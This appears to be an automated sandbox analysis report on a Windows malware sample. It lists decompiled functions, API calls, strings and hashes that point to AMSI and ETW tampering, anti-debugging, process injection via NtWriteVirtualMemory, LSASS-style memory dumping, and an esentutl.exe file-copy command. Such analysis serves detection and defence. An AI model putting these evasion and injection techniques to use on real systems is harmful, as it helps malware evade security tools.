Part of subcall function 02E7C36C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02FEB8B8,?,02E9074D,ScanBuffer,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,OpenSession), ref: 02E7C383

Part of subcall function 02E8DD6C: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDA7
Part of subcall function 02E8DD6C: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDD7
Part of subcall function 02E8DD6C: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E8DDEC
Part of subcall function 02E8DD6C: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E8DE18
Part of subcall function 02E8DD6C: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E8DE21

Part of subcall function 02E77E88: GetFileAttributesA.KERNEL32(00000000,?,02E9356B,ScanString,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,ScanBuffer,02EF7380,02E9B7B4,OpenSession,02EF7380,02E9B7B4,Initialize), ref: 02E77E93

Part of subcall function 02E78050: CreateDirectoryA.KERNEL32(00000000,00000000,?,02E93709,OpenSession,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4,Initialize,02EF7380,02E9B7B4,ScanString,02EF7380,02E9B7B4), ref: 02E7805D

Strings

CryptSIPVerifyIndirectData, xrefs: 02E8FDC3, 02E9A177
GetProcessMemoryInfo, xrefs: 02E9A144
GZmMS1j, xrefs: 02E8F80B
NtAlertResumeThread, xrefs: 02E9A60D
EtwEventWrite, xrefs: 02E9B144
LdrGetProcedureAddress, xrefs: 02E9B078
RtlAllocateHeap, xrefs: 02E9A640, 02E9A6A6
CryptSIPGetInfo, xrefs: 02E8FD90
endpointdlp, xrefs: 02E9A460, 02E9A493, 02E9A4C6, 02E9A4F9
NtWriteVirtualMemory, xrefs: 02E9B0AB
SetUnhandledExceptionFilter, xrefs: 02E9AC07
DllRegisterServer, xrefs: 02E8FB50, 02E9009C
UacScan, xrefs: 02E8F832, 02E900D5, 02E901CD, 02E9079C, 02E91382, 02E91960, 02E922C2, 02E929D5, 02E93C2A, 02E95B8B, 02E960FB, 02E962C0, 02E965E6, 02E966F3, 02E96951, 02E96A49, 02E975EC, 02E9798E, 02E97BA5, 02E97D38, 02E97F8C, 02E98418, 02E985A1, 02E986FA, 02E988A0, 02E98A2D, 02E98BC1, 02E98D40, 02E98FB7, 02E99425, 02E9963F, 02E99820, 02E999B9, 02E99BEF, 02E9AA5F
NtDeviceIoControlFile, xrefs: 02E9A981
ieproxy, xrefs: 02E8FB10, 02E8FB37, 02E8FB67
http, xrefs: 02E92124
[InternetShortcut], xrefs: 02E96D44
WintrustAddActionID, xrefs: 02E8FC32
NtQueryDirectoryFile, xrefs: 02E9A990
UacUninitialize, xrefs: 02E93840, 02E93BAE
BCryptRegisterProvider, xrefs: 02E8FF0B
NtOpenProcess, xrefs: 02E99286
ScanString, xrefs: 02E8F95E, 02E8FB89, 02E8FC9E, 02E8FE2F, 02E8FFC0, 02E90249, 02E9038A, 02E90910, 02E91528, 02E916C4, 02E91B00, 02E91D1B, 02E91D97, 02E920B4, 02E923DA, 02E926A3, 02E92AE0, 02E92F11, 02E93121, 02E931D7, 02E934D9, 02E935FB, 02E938BC, 02E955B4, 02E9574E, 02E95A93, 02E95E57, 02E964EE, 02E96CD4, 02E96E4B, 02E96F03, 02E97570, 02E97A0A, 02E97E71, 02E98494, 02E98F3B, 02E9932D, 02E99716, 02E99AF7, 02E99DF5, 02E9A1B0, 02E9A597, 02E9A78E, 02E9AD38
wintrust, xrefs: 02E8FC16, 02E8FC49, 02E8FC7C
Ntdll, xrefs: 02E9A977, 02E9A986, 02E9A995, 02E9A9A4
NtOpenFile, xrefs: 02E9B0DE
DllGetClassObject, xrefs: 02E8FAFF, 02E90036, 02E9A111, 02E9ADE1
BCryptQueryProviderRegistration, xrefs: 02E8FED8
ScanBuffer, xrefs: 02E8F9C2, 02E8FD1A, 02E8FF44, 02E904AB, 02E905B8, 02E906D0, 02E90AA4, 02E90C42, 02E90DE8, 02E90F08, 02E9109D, 02E91195, 02E913FE, 02E915A4, 02E91740, 02E91856, 02E918E4, 02E91BF8, 02E91E99, 02E91FAA, 02E92147, 02E924F2, 02E925FE, 02E9281C, 02E92939, 02E92C54, 02E92CF5, 02E92E69, 02E93029, 02E9334B, 02E93715, 02E939B4, 02E93AB6, 02E956AC, 02E959E6, 02E95CFF, 02E9607F, 02E963B8, 02E96662, 02E96867, 02E969CD, 02E96B41, 02E96BBD, 02E97760, 02E977F1, 02E97C21, 02E97DB4, 02E97F10, 02E98008, 02E98525, 02E987F2, 02E98998, 02E98B25, 02E98CB9, 02E98E38, 02E990AF, 02E991A7, 02E995C3, 02E9989C, 02E99A35, 02E99C6B, 02E99CFD, 02E9A035, 02E9A3D3, 02E9A902, 02E9B208
VirtualProtect, xrefs: 02E9AB3B
NtQueryVirtualMemory, xrefs: 02E9AEAD
C:\\Windows\\System32\\esentutl.exe /y , xrefs: 02E964A6
dbgcore, xrefs: 02E9924F, 02E99263
SLGetEncryptedPIDEx, xrefs: 02E9AE47
psapi, xrefs: 02E9A9EF
CreateProcessAsUserA, xrefs: 02E9AA17
I_QueryTagInformation, xrefs: 02E99236
SLLoadApplicationPolicies, xrefs: 02E99F04
NtQueryInformationThread, xrefs: 02E9AEE0
NtMapViewOfSection, xrefs: 02E9AF79
MZP, xrefs: 02E9998E
ntdll, xrefs: 02E99227, 02E99277, 02E9928B, 02E9A624, 02E9A657, 02E9A68A, 02E9A6BD, 02E9A6F0, 02E9AE91, 02E9AEC4, 02E9AEF7, 02E9AF2A, 02E9AF5D, 02E9AF90, 02E9AFC3, 02E9AFF6, 02E9B029, 02E9B05C, 02E9B08F, 02E9B0C2, 02E9B0F5, 02E9B128, 02E9B15B
can, xrefs: 02E93D11
sppc, xrefs: 02E99E82, 02E99EB5, 02E99EE8, 02E99F1B, 02E9AE2B, 02E9AE5E
/d , xrefs: 02E964B1
NtOpenObjectAuditAlarm, xrefs: 02E99222
DllGetActivationFactory, xrefs: 02E90069
advapi32, xrefs: 02E9923B
OpenSession, xrefs: 02E8F896, 02E8FA26, 02E9030E, 02E9042F, 02E9053C, 02E90654, 02E90A28, 02E90BC6, 02E90D6C, 02E90E8C, 02E91021, 02E91119, 02E91306, 02E914AC, 02E917DA, 02E91A08, 02E91B7C, 02E91C9F, 02E91E1D, 02E921C3, 02E92246, 02E9235E, 02E92476, 02E92582, 02E927A0, 02E928BD, 02E92B5C, 02E92BD8, 02E92DED, 02E92F8D, 02E932CF, 02E9345D, 02E93677, 02E93791, 02E93B32, 02E95630, 02E957CA, 02E9596A, 02E95B0F, 02E95C83, 02E95ED3, 02E95F87, 02E96244, 02E9633C, 02E967EB, 02E96AC5, 02E96C39, 02E96DCF, 02E96F7F, 02E97668, 02E9786D, 02E97A86, 02E97B29, 02E97CBC, 02E98084, 02E98320, 02E9861D, 02E98776, 02E9891C, 02E98AA9, 02E98C3D, 02E98DBC, 02E98EBF, 02E99033, 02E992B1, 02E994A1, 02E99792, 02E99918, 02E99B73, 02E99D79, 02E99F3D, 02E9A22C, 02E9A2DB, 02E9A51B, 02E9A712, 02E9A80A, 02E9ACBC, 02E9B284
.url, xrefs: 02E95D8F
NtOpenSection, xrefs: 02E9AF13
C:\Windows\System32\, xrefs: 02E90406, 02E97967, 02E986AF
RtlCreateQueryDebugBuffer, xrefs: 02E9A6D9
EnumServicesStatusExA, xrefs: 02E9A9CC
DlpGetArchiveFileTraceInfo, xrefs: 02E9A4AF
BCryptVerifySignature, xrefs: 02E8FEA5, 02E9A2A2
SxTracerGetThreadContextDebug, xrefs: 02E9A0DE, 02E9ADAE
CryptSIPGetSignedDataMsg, xrefs: 02E8FDF6
SLGatherMigrationBlob, xrefs: 02E9AE14
FlushInstructionCache, xrefs: 02E9ABD4
tquery, xrefs: 02E9A0C2
spp, xrefs: 02E9A0F5, 02E9A128, 02E9ADC5
C:\Users\Public\, xrefs: 02E95D84, 02E96FEF
WriteVirtualMemory, xrefs: 02E9ABA1
MiniDumpWriteDump, xrefs: 02E9924A
CreateProcessW, xrefs: 02E9AA08
LdrLoadDll, xrefs: 02E9B045
OpenProcess, xrefs: 02E9AB6E
IconIndex=, xrefs: 02E96DA9
RetailTracerEnable, xrefs: 02E9A0AB
NtSetSecurityObject, xrefs: 02E99272
EnumServicesStatusW, xrefs: 02E9A9BD
bcrypt, xrefs: 02E8FEBC, 02E8FEEF, 02E8FF22, 02E9A2B9
acS, xrefs: 02E93CFE
GET, xrefs: 02E92451
C:\\Users\\Public\\Libraries\\, xrefs: 02E9616B
NtQuerySystemInformation, xrefs: 02E9A972
NtWaitForSingleObject, xrefs: 02E9A673
GetProxyDllInfo, xrefs: 02E8FB26
VirtualAllocEx, xrefs: 02E9AB08
Kernel32, xrefs: 02E9A9FE, 02E9AA0D, 02E9AA49
URL=file:", xrefs: 02E96D53
Advapi, xrefs: 02E9A9B3, 02E9A9C2, 02E9A9D1, 02E9A9E0, 02E9AA1C, 02E9AA2B, 02E9AA3A
SLIsGenuineLocalEx, xrefs: 02E99ED1
DlpNotifyPreDragDrop, xrefs: 02E9A449
EnumProcessModules, xrefs: 02E9A9EA
mssip32, xrefs: 02E8FDA7, 02E8FDDA, 02E8FE0D, 02E9A18E
TrustOpenStores, xrefs: 02E8FBFF
HotKey=, xrefs: 02E96EDD
EtwEventWriteEx, xrefs: 02E9B111
DlpGetWebSiteAccess, xrefs: 02E9A4E2
sppwmi, xrefs: 02E9ADF8
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 02E90986
NtQuerySecurityObject, xrefs: 02E9AFDF
CreateProcessAsUserW, xrefs: 02E9AA26, 02E9AA44
NtReadVirtualMemory, xrefs: 02E9AFAC
CreateProcessA, xrefs: 02E9A9F9
SLGetSLIDList, xrefs: 02E99E9E
VirtualAlloc, xrefs: 02E9AAD5
CreateProcessWithLogonW, xrefs: 02E9AA35
smartscreenps, xrefs: 02E9004D, 02E90080, 02E900B3
kernel32, xrefs: 02E9AAEC, 02E9AB1F, 02E9AB52, 02E9AB85, 02E9ABB8, 02E9ABEB, 02E9AC1E
MiniDumpReadDumpStream, xrefs: 02E9925E
NtAccessCheck, xrefs: 02E9B012
NtCreateSection, xrefs: 02E9AF46
Initialize, xrefs: 02E8F8FA, 02E90818, 02E909AC, 02E90B4A, 02E90CF0, 02E90FA5, 02E91648, 02E91A84, 02E91F2E, 02E92038, 02E9271F, 02E92A51, 02E92D71, 02E930A5, 02E93253, 02E9357F, 02E93938, 02E95872, 02E95C07, 02E96003, 02E961C8, 02E96434, 02E9656A, 02E9676F, 02E976E4, 02E9839C, 02E993A9, 02E99FB9, 02E9A357, 02E9A886, 02E9AC40, 02E9B18C
FindCertsByIssuer, xrefs: 02E8FC65
WinHttp.WinHttpRequest.5.1, xrefs: 02E92338
SLGetGenuineInformation, xrefs: 02E99E6B
psapi, xrefs: 02E9A15B
UacInitialize, xrefs: 02E8FA8A, 02E90151, 02E90894, 02E95538, 02E958EE, 02E95DDB, 02E978E9, 02E9912B, 02E99547
EnumServicesStatusExW, xrefs: 02E9A9DB
NtGetWriteWatch, xrefs: 02E9AE7A
EnumServicesStatusA, xrefs: 02E9A9AE
RtlQueryProcessDebugInformation, xrefs: 02E9A99F
/o, xrefs: 02E964BC
DlpCheckIsCloudSyncApp, xrefs: 02E9A47C

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: File$Module$AddressAttributesHandleNamePathProc$CheckCloseCreateDebuggerDirectoryInetInformationName_OfflineOpenPresentQueryReadRemote
String ID: /d $ /o$.url$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\esentutl.exe /y $CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$acS$advapi32$bcrypt$can$dbgcore$endpointdlp$http$ieproxy$kernel32$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$tquery$wintrust
API String ID: 3690412309-2644593349
Opcode ID: 5dad43643d61d9ed85e787d2ad0c46de407401f7152ae17ad2251acc3fbf233d
Instruction ID: 1511aa25f6e532bb75fb0c1d2b329c5dbbd6a5a38d43fafa85fe8b82a174985b
Opcode Fuzzy Hash: 5dad43643d61d9ed85e787d2ad0c46de407401f7152ae17ad2251acc3fbf233d
Instruction Fuzzy Hash: 4614FC35AD015D8BDF51EB64E880ACE73B6FB85304F50E1EAE509AB254DB30AE81CF51

Function 02E75ACC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E70000,02E9E790), ref: 02E75AE8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B06
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E70000,02E9E790), ref: 02E75B24
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E75B42
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E75B8B
RegQueryValueExA.ADVAPI32(?,02E75D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E75BD1,?,80000001), ref: 02E75BA9
RegCloseKey.ADVAPI32(?,02E75BD8,00000000,?,?,00000000,02E75BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E75BCB
lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02E75BE8
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02E75BF5
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02E75BFB
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02E75C26
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75C6D
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75C7D
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02E75CA5
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02E75CB5
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02E75CDB
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02E75CEB

Strings

Software\Borland\Locales, xrefs: 02E75AFC, 02E75B1A
Software\Borland\Delphi\Locales, xrefs: 02E75B38

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: a5f55662e749810e53b929913aeaef6cb8a2b51061e927186a993043d74fc5d6
Instruction ID: e104d246bf62e73a5c04debc78bd533073ec4a3b0d379cf182e1ed8862cca8d1
Opcode Fuzzy Hash: a5f55662e749810e53b929913aeaef6cb8a2b51061e927186a993043d74fc5d6
Instruction Fuzzy Hash: 5851A771A8035C7EFB21D6A48C46FEF77AD9B04744F8091A1BE08EA1C1EB749A449F61

Function 02E8F740 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KernelBase), ref: 02E8F750
GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02E8F762
CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02E8F779

Strings

KernelBase, xrefs: 02E8F74B
CheckRemoteDebuggerPresent, xrefs: 02E8F75C

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: AddressCheckDebuggerHandleModulePresentProcRemote
String ID: CheckRemoteDebuggerPresent$KernelBase
API String ID: 35162468-539270669
Opcode ID: 8e1cf832fdc8a24bfcbef0fcdef87095647a5c470804907d2216ae5741be23d0
Instruction ID: 2d16ab4ec513236ab2ea3b0d22db06ff0f4882e382c22f075ba936518f0447ea
Opcode Fuzzy Hash: 8e1cf832fdc8a24bfcbef0fcdef87095647a5c470804907d2216ae5741be23d0
Instruction Fuzzy Hash: 01F0A770994248BAFB10B7F88C8879CFBA95B0532DFA49394A47C725C1F7760684C655

Function 02E8DD6C Relevance: 7.6, APIs: 5, Instructions: 80
nativefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E74F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02E74F2E

RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDA7
NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02E8DE3C), ref: 02E8DDD7
NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02E8DDEC
NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02E8DE18
NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02E8DE21

Part of subcall function 02E74C60: SysFreeString.OLEAUT32(02E8F4A0), ref: 02E74C6E

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
String ID:
API String ID: 1897104825-0
Opcode ID: 24717bbd89530d5d847e5ff9a540307847798be994c8430bf8e66d63bc739741
Instruction ID: 325c422c66455e7c28a1edda22d10b31c96be66c07465883171b4e027461e9e7
Opcode Fuzzy Hash: 24717bbd89530d5d847e5ff9a540307847798be994c8430bf8e66d63bc739741
Instruction Fuzzy Hash: 8A21C075A80209BAEB11EAE4CC52FDFB7BDEB48700F505461B604F71C0DA74AA058B94

Function 02E8E4B4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E8E5F2

Strings

ScanBuffer, xrefs: 02E8E53B
OpenSession, xrefs: 02E8E594
Initialize, xrefs: 02E8E4E2

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 05f0f72a2ce64c2766bc44a61e5a54731eece04dbd726b30ede74037df41df27
Instruction ID: 7472d7190d13a2fcc272bc1c28f808604c7cecafab7a47dc86fae162b067357e
Opcode Fuzzy Hash: 05f0f72a2ce64c2766bc44a61e5a54731eece04dbd726b30ede74037df41df27
Instruction Fuzzy Hash: DB411B35B901099BEB01FBA4D841A9EB3FAEF98700F60E465F489A7291DA30AD01CF51

Function 02E87D80 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E881D4: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E88244,?,?,00000000,?,02E87A86,ntdll,00000000,00000000,02E87ACB,?,?,00000000), ref: 02E88212
Part of subcall function 02E881D4: GetModuleHandleA.KERNELBASE(?), ref: 02E88226

Part of subcall function 02E8827C: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E88304,?,?,00000000,00000000,?,02E8821D,00000000,KernelBASE,00000000,00000000,02E88244), ref: 02E882C9
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E882CF
Part of subcall function 02E8827C: GetProcAddress.KERNEL32(?,?), ref: 02E882E1

NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E87DF4

Strings

yromeMlautriVetirW, xrefs: 02E87D9B
Ntdll, xrefs: 02E87DCB

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: HandleModule$AddressProc$MemoryVirtualWrite
String ID: Ntdll$yromeMlautriVetirW
API String ID: 2719805696-3542721025
Opcode ID: 1b9f10d576efae02a96d08c80919f9a218d9a6bd24dd42f5f4373804ec8dc779
Instruction ID: 05760a073dffacb93782131cec40adbdf5ae3ff0335f130893fc4b5b7369a08c
Opcode Fuzzy Hash: 1b9f10d576efae02a96d08c80919f9a218d9a6bd24dd42f5f4373804ec8dc779
Instruction Fuzzy Hash: 5E012D796C0208BFEB40EFA8DC42E5AB7EEEB48700F61E454F948D7650D630AD50CB65

Function 02E86DD0 Relevance: 1.5, APIs: 1, Instructions: 48
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 02E86D74: CLSIDFromProgID.OLE32(00000000,?,00000000,02E86DC1,?,?,?,00000000), ref: 02E86DA1

CoCreateInstance.OLE32(?,00000000,00000005,02E86EB4,00000000,00000000,02E86E33,?,00000000,02E86EA3), ref: 02E86E1F

Memory Dump Source

Source File: 00000000.00000002.2584189726.0000000002E71000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true

Associated: 00000000.00000002.2584134863.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584298983.0000000002E9E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002EF7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2584515530.0000000002FEE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e70000_6BE4RDldhw.jbxd

Similarity

API ID: CreateFromInstanceProg
